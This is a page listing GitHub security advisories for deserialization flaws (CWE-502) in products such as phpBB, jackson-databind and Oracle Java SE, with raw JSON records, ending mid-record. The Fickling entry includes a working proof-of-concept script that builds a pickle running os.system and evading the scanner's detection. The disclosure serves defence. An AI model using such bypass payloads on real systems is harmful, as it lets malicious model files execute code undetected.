Common Weakness Enumeration

CWE-502

Allowed

Deserialization of Untrusted Data

Abstraction: Base · Status: Draft

The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

4797 vulnerabilities reference this CWE, most recent first.

GHSA-H3MR-Q96R-37V4

Vulnerability from github – Published: 2022-05-13 01:50 – Updated: 2024-04-24 17:50
VLAI
Summary
phpBB Remote Code Execution
Details

Passing an absolute path to a file_exists check in phpBB before 3.2.4 allows Remote Code Execution through Object Injection by employing Phar deserialization when an attacker has access to the Admin Control Panel with founder permissions.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpbb/phpbb"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.2.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2018-19274"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-24T17:50:29Z",
    "nvd_published_at": "2018-11-17T13:29:00Z",
    "severity": "HIGH"
  },
  "details": "Passing an absolute path to a file_exists check in phpBB before 3.2.4 allows Remote Code Execution through Object Injection by employing Phar deserialization when an attacker has access to the Admin Control Panel with founder permissions.",
  "id": "GHSA-h3mr-q96r-37v4",
  "modified": "2024-04-24T17:50:29Z",
  "published": "2022-05-13T01:50:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19274"
    },
    {
      "type": "WEB",
      "url": "https://blog.ripstech.com/2018/phpbb3-phar-deserialization-to-remote-code-execution"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/phpbb/phpbb-app"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2018/11/msg00029.html"
    },
    {
      "type": "WEB",
      "url": "https://www.phpbb.com/community/viewtopic.php?f=14\u0026t=2492206"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "phpBB Remote Code Execution"
}

GHSA-H479-2MV4-5C26

Vulnerability from github – Published: 2022-10-11 20:45 – Updated: 2022-10-13 20:10
VLAI
Summary
melisplatform/melis-front vulnerable to deserialization of untrusted data
Details

Impact

Attackers can deserialize arbitrary data on affected versions of melisplatform/melis-front, and ultimately leads to the execution of arbitrary PHP code on the system. Conducting this attack does not require authentication.

Users should immediately upgrade to melisplatform/melis-front >= 5.0.1.

Patches

This issue was addressed by restricting allowed classes when deserializing user-controlled data.

References

  • https://github.com/melisplatform/melis-front/commit/89ae612d5f1f7aa2fb621ee8de27dffe1feb851e

For more information

If you have any questions or comments about this advisory, you can contact: - The original reporters, by sending an email to vulnerability.research [at] sonarsource.com; - The maintainers, by opening an issue on this repository.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "melisplatform/melis-front"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-39298"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-10-11T20:45:42Z",
    "nvd_published_at": "2022-10-12T23:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nAttackers can deserialize arbitrary data on affected versions of `melisplatform/melis-front`, and ultimately leads to the execution of arbitrary PHP code on the system. Conducting this attack does not require authentication.\n\nUsers should immediately upgrade to `melisplatform/melis-front` \u003e= 5.0.1.\n\n### Patches\n\nThis issue was addressed by restricting allowed classes when deserializing user-controlled data. \n\n### References\n\n- https://github.com/melisplatform/melis-front/commit/89ae612d5f1f7aa2fb621ee8de27dffe1feb851e\n\n### For more information\n\nIf you have any questions or comments about this advisory, you can contact:\n- The original reporters, by sending an email to vulnerability.research [at] sonarsource.com;\n- The maintainers, by opening an issue on this repository.\n",
  "id": "GHSA-h479-2mv4-5c26",
  "modified": "2022-10-13T20:10:05Z",
  "published": "2022-10-11T20:45:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/melisplatform/melis-front/security/advisories/GHSA-h479-2mv4-5c26"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39298"
    },
    {
      "type": "WEB",
      "url": "https://github.com/melisplatform/melis-front/commit/89ae612d5f1f7aa2fb621ee8de27dffe1feb851e"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/melisplatform/melis-front"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "melisplatform/melis-front vulnerable to deserialization of untrusted data"
}

GHSA-H48Q-QVJQ-C932

Vulnerability from github – Published: 2026-02-03 21:31 – Updated: 2026-02-05 09:31
VLAI
Details

Blesta 3.x through 5.x before 5.13.3 allows object injection, aka CORE-5680.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-25614"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-03T20:15:58Z",
    "severity": "HIGH"
  },
  "details": "Blesta 3.x through 5.x before 5.13.3 allows object injection, aka CORE-5680.",
  "id": "GHSA-h48q-qvjq-c932",
  "modified": "2026-02-05T09:31:12Z",
  "published": "2026-02-03T21:31:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25614"
    },
    {
      "type": "WEB",
      "url": "https://www.blesta.com/2026/01/28/security-advisory"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2026/Feb/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H4F2-RJW2-W3JJ

Vulnerability from github – Published: 2025-01-17 12:30 – Updated: 2025-01-17 12:30
VLAI
Details

CWE-502: Deserialization of untrusted data vulnerability exists that could lead to loss of confidentiality, integrity and potential remote code execution on workstation when a non-admin authenticated user opens a malicious project file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-12703"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-17T11:15:08Z",
    "severity": "HIGH"
  },
  "details": "CWE-502: Deserialization of untrusted data vulnerability exists that could lead to loss of confidentiality, integrity\nand potential remote code execution on workstation when a non-admin authenticated user opens a malicious\nproject file.",
  "id": "GHSA-h4f2-rjw2-w3jj",
  "modified": "2025-01-17T12:30:41Z",
  "published": "2025-01-17T12:30:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-12703"
    },
    {
      "type": "WEB",
      "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-014-06\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2025-014-06.pdf"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-H4MR-59X2-64F9

Vulnerability from github – Published: 2025-04-28 18:30 – Updated: 2025-04-28 18:30
VLAI
Details

DevExpress before 23.1.3 has a data-source protection mechanism bypass during deserialization on XML data.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-35815"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-28T16:15:25Z",
    "severity": "LOW"
  },
  "details": "DevExpress before 23.1.3 has a data-source protection mechanism bypass during deserialization on XML data.",
  "id": "GHSA-h4mr-59x2-64f9",
  "modified": "2025-04-28T18:30:57Z",
  "published": "2025-04-28T18:30:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-35815"
    },
    {
      "type": "WEB",
      "url": "https://code-white.com/public-vulnerability-list"
    },
    {
      "type": "WEB",
      "url": "https://supportcenter.devexpress.com/ticket/details/t1141947/data-source-protection-bypass-during-xml-deserialization"
    },
    {
      "type": "WEB",
      "url": "https://supportcenter.devexpress.com/ticket/details/t1159142/web-reporting-data-source-protection-bypassed-during-xml-deserialization"
    },
    {
      "type": "WEB",
      "url": "https://supportcenter.devexpress.com/ticket/details/t394936/devexpress-security-advisory-updated-on-april-27-2023"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-H4QR-6JJ2-9QG8

Vulnerability from github – Published: 2025-08-12 12:30 – Updated: 2025-08-12 12:30
VLAI
Details

A vulnerability has been identified in SIMATIC PCS neo V4.1 (All versions), SIMATIC PCS neo V5.0 (All versions), SIMATIC PCS neo V6.0 (All versions), SIMATIC S7-PLCSIM V17 (All versions), SIMATIC STEP 7 V17 (All versions), SIMATIC STEP 7 V18 (All versions), SIMATIC STEP 7 V19 (All versions < V19 Update 4), SIMATIC STEP 7 V20 (All versions), SIMATIC WinCC V17 (All versions), SIMATIC WinCC V18 (All versions), SIMATIC WinCC V19 (All versions < V19 Update 4), SIMATIC WinCC V20 (All versions), SIMOCODE ES V17 (All versions), SIMOCODE ES V18 (All versions), SIMOCODE ES V19 (All versions), SIMOCODE ES V20 (All versions), SIMOTION SCOUT TIA V5.4 (All versions), SIMOTION SCOUT TIA V5.5 (All versions), SIMOTION SCOUT TIA V5.6 (All versions < V5.6 SP1 HF7), SIMOTION SCOUT TIA V5.7 (All versions), SINAMICS Startdrive V17 (All versions), SINAMICS Startdrive V18 (All versions), SINAMICS Startdrive V19 (All versions), SINAMICS Startdrive V20 (All versions), SIRIUS Safety ES V17 (TIA Portal) (All versions), SIRIUS Safety ES V18 (TIA Portal) (All versions), SIRIUS Safety ES V19 (TIA Portal) (All versions), SIRIUS Safety ES V20 (TIA Portal) (All versions), SIRIUS Soft Starter ES V17 (TIA Portal) (All versions), SIRIUS Soft Starter ES V18 (TIA Portal) (All versions), SIRIUS Soft Starter ES V19 (TIA Portal) (All versions), SIRIUS Soft Starter ES V20 (TIA Portal) (All versions), TIA Portal Cloud V17 (All versions), TIA Portal Cloud V18 (All versions), TIA Portal Cloud V19 (All versions < V5.2.1.1), TIA Portal Cloud V20 (All versions), TIA Portal Test Suite V20 (All versions). Affected products do not properly sanitize Interprocess Communication input received through a Windows Named Pipe accessible to all local users. This could allow an authenticated local attacker to cause a type confusion and execute arbitrary code within the affected application.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-54678"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-12T12:15:34Z",
    "severity": "HIGH"
  },
  "details": "A vulnerability has been identified in SIMATIC PCS neo V4.1 (All versions), SIMATIC PCS neo V5.0 (All versions), SIMATIC PCS neo V6.0 (All versions), SIMATIC S7-PLCSIM V17 (All versions), SIMATIC STEP 7 V17 (All versions), SIMATIC STEP 7 V18 (All versions), SIMATIC STEP 7 V19 (All versions \u003c V19 Update 4), SIMATIC STEP 7 V20 (All versions), SIMATIC WinCC V17 (All versions), SIMATIC WinCC V18 (All versions), SIMATIC WinCC V19 (All versions \u003c V19 Update 4), SIMATIC WinCC V20 (All versions), SIMOCODE ES V17 (All versions), SIMOCODE ES V18 (All versions), SIMOCODE ES V19 (All versions), SIMOCODE ES V20 (All versions), SIMOTION SCOUT TIA V5.4 (All versions), SIMOTION SCOUT TIA V5.5 (All versions), SIMOTION SCOUT TIA V5.6 (All versions \u003c V5.6 SP1 HF7), SIMOTION SCOUT TIA V5.7 (All versions), SINAMICS Startdrive V17 (All versions), SINAMICS Startdrive V18 (All versions), SINAMICS Startdrive V19 (All versions), SINAMICS Startdrive V20 (All versions), SIRIUS Safety ES V17 (TIA Portal) (All versions), SIRIUS Safety ES V18 (TIA Portal) (All versions), SIRIUS Safety ES V19 (TIA Portal) (All versions), SIRIUS Safety ES V20 (TIA Portal) (All versions), SIRIUS Soft Starter ES V17 (TIA Portal) (All versions), SIRIUS Soft Starter ES V18 (TIA Portal) (All versions), SIRIUS Soft Starter ES V19 (TIA Portal) (All versions), SIRIUS Soft Starter ES V20 (TIA Portal) (All versions), TIA Portal Cloud V17 (All versions), TIA Portal Cloud V18 (All versions), TIA Portal Cloud V19 (All versions \u003c V5.2.1.1), TIA Portal Cloud V20 (All versions), TIA Portal Test Suite V20 (All versions). Affected products do not properly sanitize Interprocess Communication input received through a Windows Named Pipe accessible to all local users. This could allow an authenticated local attacker to cause a type confusion and execute arbitrary code within the affected application.",
  "id": "GHSA-h4qr-6jj2-9qg8",
  "modified": "2025-08-12T12:30:33Z",
  "published": "2025-08-12T12:30:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-54678"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/html/ssa-693808.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-H4RC-386G-6M85

Vulnerability from github – Published: 2020-04-23 20:19 – Updated: 2024-03-15 00:41
VLAI
Summary
jackson-databind mishandles the interaction between serialization gadgets and typing
Details

FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly).

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.9.10.3"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.9.0"
            },
            {
              "fixed": "2.9.10.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-11620"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-04-22T21:17:03Z",
    "nvd_published_at": "2020-04-07T23:15:00Z",
    "severity": "HIGH"
  },
  "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.jelly.impl.Embedded (aka commons-jelly).",
  "id": "GHSA-h4rc-386g-6m85",
  "modified": "2024-03-15T00:41:34Z",
  "published": "2020-04-23T20:19:02Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11620"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/issues/2682"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/77040d85e3eb6710508e6445640ae1a3d5e60c22"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FasterXML/jackson-databind"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20200511-0004"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujan2021.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujul2020.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing"
}

GHSA-H4RM-MM56-XF63

Vulnerability from github – Published: 2026-01-09 22:29 – Updated: 2026-01-11 14:55
VLAI
Summary
Fickling vulnerable to detection bypass due to "builtins" blindness
Details

Fickling's assessment

Fickling started emitting AST nodes for builtins imports in order to match them during analysis (https://github.com/trailofbits/fickling/commit/9f309ab834797f280cb5143a2f6f987579fa7cdf).

Original report

Summary

Fickling works by Pickle bytecode --> AST --> Security analysis However while going from bytecode to AST, some import nodes are removed which blinds the security analysis

fickling/fickling/fickle.py

    def run(self, interpreter: Interpreter):
        module, attr = self.module, self.attr
        if module in ("__builtin__", "__builtins__", "builtins"):
            # no need to emit an import for builtins!
            pass
        else:
            alias = ast.alias(attr)
            interpreter.module_body.append(ast.ImportFrom(module=module, names=[alias], level=0))
        interpreter.stack.append(ast.Name(attr, ast.Load()))

    def encode(self) -> bytes:
        return f"c{self.module}\n{self.attr}\n".encode()

Here we see that no import nodes are emitted for builtins However builtins is marked as an unsafe import

fickling/fickling/analysis.py

UNSAFE_MODULES = {
        "__builtin__": "This module contains dangerous functions that can execute arbitrary code.",
        "__builtins__": "This module contains dangerous functions that can execute arbitrary code.",
        "builtins": "This module contains dangerous functions that can execute arbitrary code.",

But because there are no import nodes for builtins (they werent emitted when making the AST), the security scanner is effectively blind.

This can allow for security bypasses like this

poc.py (script to create payload)

import os

GLOBAL = b'c'    # Import module.name
STRING = b'S'    # Push string
TUPLE1 = b'\x85' # Build tuple of 1
TUPLE2 = b'\x86' # Build tuple of 2
EMPTY_TUPLE = b')'
REDUCE = b'R'    # Call function
PUT    = b'p'    # Memoize (Variable assignment)
GET    = b'g'    # Load from memo (Variable usage)
POP    = b'0'    # Discard top of stack
EMPTY_DICT = b'}'
SETITEM = b's'   # Add key/value to dict
BUILD  = b'b'    # Update object state (Liveness satisfy)
STOP   = b'.'    # Finish and return stack top

def generate_raw_payload():
    payload = b""

    payload += GLOBAL + b"builtins\n__import__\n"
    payload += STRING + b"'os'\n"
    payload += TUPLE1 + REDUCE
    payload += PUT + b"0\n" # _var0 = os module
    payload += POP

    payload += GLOBAL + b"builtins\ngetattr\n"
    payload += GET + b"0\n" # os module
    payload += STRING + b"'system'\n"
    payload += TUPLE2 + REDUCE
    payload += PUT + b"1\n" # _var1 = os.system
    payload += POP

    payload += GET + b"1\n" # os.system
    payload += STRING + b"'whoami'\n" # COMMAND
    payload += TUPLE1 + REDUCE
    payload += PUT + b"2\n" 
    payload += POP

    payload += GLOBAL + b"builtins\nException\n"
    payload += EMPTY_TUPLE + REDUCE
    payload += PUT + b"3\n"

    payload += EMPTY_DICT
    payload += STRING + b"'rce_status'\n"
    payload += GET + b"2\n" 
    payload += SETITEM  

    payload += BUILD

    payload += STOP

    return payload

if __name__ == "__main__":
    data = generate_raw_payload()
    with open("raw_bypass.pkl", "wb") as f:
        f.write(data)

    print("Generated 'raw_bypass.pkl'")

This creates a pickle file which imports the OS module using import which is a part of builtins. if the security scanner wasnt blinded it would have been flagged immidiately.

However now fickling sees the pickle payload as

_var0 = __import__('os')
_var1 = getattr(_var0, 'system')
_var2 = _var1('whoami')
_var3 = Exception()
_var4 = _var3
_var4.__setstate__({'rce_status': _var2})
result0 = _var4

image

As you can see there is no mention of builtins anywhere so it isnt flagged

Additionally, the payload builder uses a technique to ensure that no variable get flagged as "UNUSED" We deceive the data flow analysis heuristic by using the BUILD opcode to update an objects internal state. By taking the result of os.system (the exit code) and using it as a value in a dictionary that is then "built" into a returned exception object, we create a logical dependency chain.

The end result is that the malicious pickle gets classified as LIKELY_SAFE

Fixes: Ensure that import objects are emitted for imports from builtins depending on what those imports are, say emit import nodes for dangerous functions like __import__ while not emitting for stuff like dict()

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.1.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "fickling"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22612"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-09T22:29:02Z",
    "nvd_published_at": "2026-01-10T02:15:50Z",
    "severity": "HIGH"
  },
  "details": "#Fickling\u0027s assessment\n\nFickling started emitting AST nodes for builtins imports in order to match them during analysis (https://github.com/trailofbits/fickling/commit/9f309ab834797f280cb5143a2f6f987579fa7cdf). \n\n# Original report\n\n### Summary\nFickling works by\nPickle bytecode --\u003e AST --\u003e Security analysis\nHowever while going from bytecode to AST, some import nodes are removed which blinds the security analysis\n\nfickling/fickling/fickle.py\n```python\n    def run(self, interpreter: Interpreter):\n        module, attr = self.module, self.attr\n        if module in (\"__builtin__\", \"__builtins__\", \"builtins\"):\n            # no need to emit an import for builtins!\n            pass\n        else:\n            alias = ast.alias(attr)\n            interpreter.module_body.append(ast.ImportFrom(module=module, names=[alias], level=0))\n        interpreter.stack.append(ast.Name(attr, ast.Load()))\n\n    def encode(self) -\u003e bytes:\n        return f\"c{self.module}\\n{self.attr}\\n\".encode()\n```\nHere we see that no import nodes are emitted for builtins\nHowever builtins is marked as an unsafe import\n\nfickling/fickling/analysis.py\n```python\nUNSAFE_MODULES = {\n        \"__builtin__\": \"This module contains dangerous functions that can execute arbitrary code.\",\n        \"__builtins__\": \"This module contains dangerous functions that can execute arbitrary code.\",\n        \"builtins\": \"This module contains dangerous functions that can execute arbitrary code.\",\n```\n\nBut because there are no import nodes for builtins (they werent emitted when making the AST), the security scanner is effectively blind.\n\nThis can allow for security bypasses like this\n\npoc.py (script to create payload)\n```python\nimport os\n\nGLOBAL = b\u0027c\u0027    # Import module.name\nSTRING = b\u0027S\u0027    # Push string\nTUPLE1 = b\u0027\\x85\u0027 # Build tuple of 1\nTUPLE2 = b\u0027\\x86\u0027 # Build tuple of 2\nEMPTY_TUPLE = b\u0027)\u0027\nREDUCE = b\u0027R\u0027    # Call function\nPUT    = b\u0027p\u0027    # Memoize (Variable assignment)\nGET    = b\u0027g\u0027    # Load from memo (Variable usage)\nPOP    = b\u00270\u0027    # Discard top of stack\nEMPTY_DICT = b\u0027}\u0027\nSETITEM = b\u0027s\u0027   # Add key/value to dict\nBUILD  = b\u0027b\u0027    # Update object state (Liveness satisfy)\nSTOP   = b\u0027.\u0027    # Finish and return stack top\n\ndef generate_raw_payload():\n    payload = b\"\"\n\n    payload += GLOBAL + b\"builtins\\n__import__\\n\"\n    payload += STRING + b\"\u0027os\u0027\\n\"\n    payload += TUPLE1 + REDUCE\n    payload += PUT + b\"0\\n\" # _var0 = os module\n    payload += POP\n\n    payload += GLOBAL + b\"builtins\\ngetattr\\n\"\n    payload += GET + b\"0\\n\" # os module\n    payload += STRING + b\"\u0027system\u0027\\n\"\n    payload += TUPLE2 + REDUCE\n    payload += PUT + b\"1\\n\" # _var1 = os.system\n    payload += POP\n\n    payload += GET + b\"1\\n\" # os.system\n    payload += STRING + b\"\u0027whoami\u0027\\n\" # COMMAND\n    payload += TUPLE1 + REDUCE\n    payload += PUT + b\"2\\n\" \n    payload += POP\n\n    payload += GLOBAL + b\"builtins\\nException\\n\"\n    payload += EMPTY_TUPLE + REDUCE\n    payload += PUT + b\"3\\n\"\n    \n    payload += EMPTY_DICT\n    payload += STRING + b\"\u0027rce_status\u0027\\n\"\n    payload += GET + b\"2\\n\" \n    payload += SETITEM  \n    \n    payload += BUILD\n    \n    payload += STOP\n\n    return payload\n\nif __name__ == \"__main__\":\n    data = generate_raw_payload()\n    with open(\"raw_bypass.pkl\", \"wb\") as f:\n        f.write(data)\n    \n    print(\"Generated \u0027raw_bypass.pkl\u0027\")\n```\n\nThis creates a pickle file which imports the OS module using __import__ which is a part of builtins. if the security scanner wasnt blinded it would have been flagged immidiately.\n\nHowever now fickling sees the pickle payload as\n\n```python\n_var0 = __import__(\u0027os\u0027)\n_var1 = getattr(_var0, \u0027system\u0027)\n_var2 = _var1(\u0027whoami\u0027)\n_var3 = Exception()\n_var4 = _var3\n_var4.__setstate__({\u0027rce_status\u0027: _var2})\nresult0 = _var4\n```\n\n\u003cimg width=\"810\" height=\"182\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5bfe8c34-7bc0-429f-83ce-d0c2f1928aca\" /\u003e\n\n\nAs you can see there is no mention of builtins anywhere so it isnt flagged\n\nAdditionally, the payload builder uses a technique to ensure that no variable get flagged as \"UNUSED\"\nWe deceive the data flow analysis heuristic by using the BUILD opcode to update an objects internal state. \nBy taking the result of os.system (the exit code) and using it as a value in a dictionary that is then \"built\" into a returned exception object, we create a logical dependency chain.\n\nThe end result is that the malicious pickle gets classified as LIKELY_SAFE\n\nFixes: \nEnsure that import objects are emitted for imports from builtins depending on what those imports are, say emit import nodes for dangerous functions like ```__import__``` while not emitting for stuff like ```dict()```",
  "id": "GHSA-h4rm-mm56-xf63",
  "modified": "2026-01-11T14:55:18Z",
  "published": "2026-01-09T22:29:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-h4rm-mm56-xf63"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22612"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/pull/195"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/commit/9f309ab834797f280cb5143a2f6f987579fa7cdf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/trailofbits/fickling"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/blob/977b0769c13537cd96549c12bb537f05464cf09c/test/test_bypasses.py#L349"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Fickling vulnerable to detection bypass due to \"builtins\" blindness"
}

GHSA-H547-5JPH-P9QQ

Vulnerability from github – Published: 2022-10-19 12:00 – Updated: 2026-05-27 18:31
VLAI
Details

Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-21624"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-10-18T21:15:00Z",
    "severity": "LOW"
  },
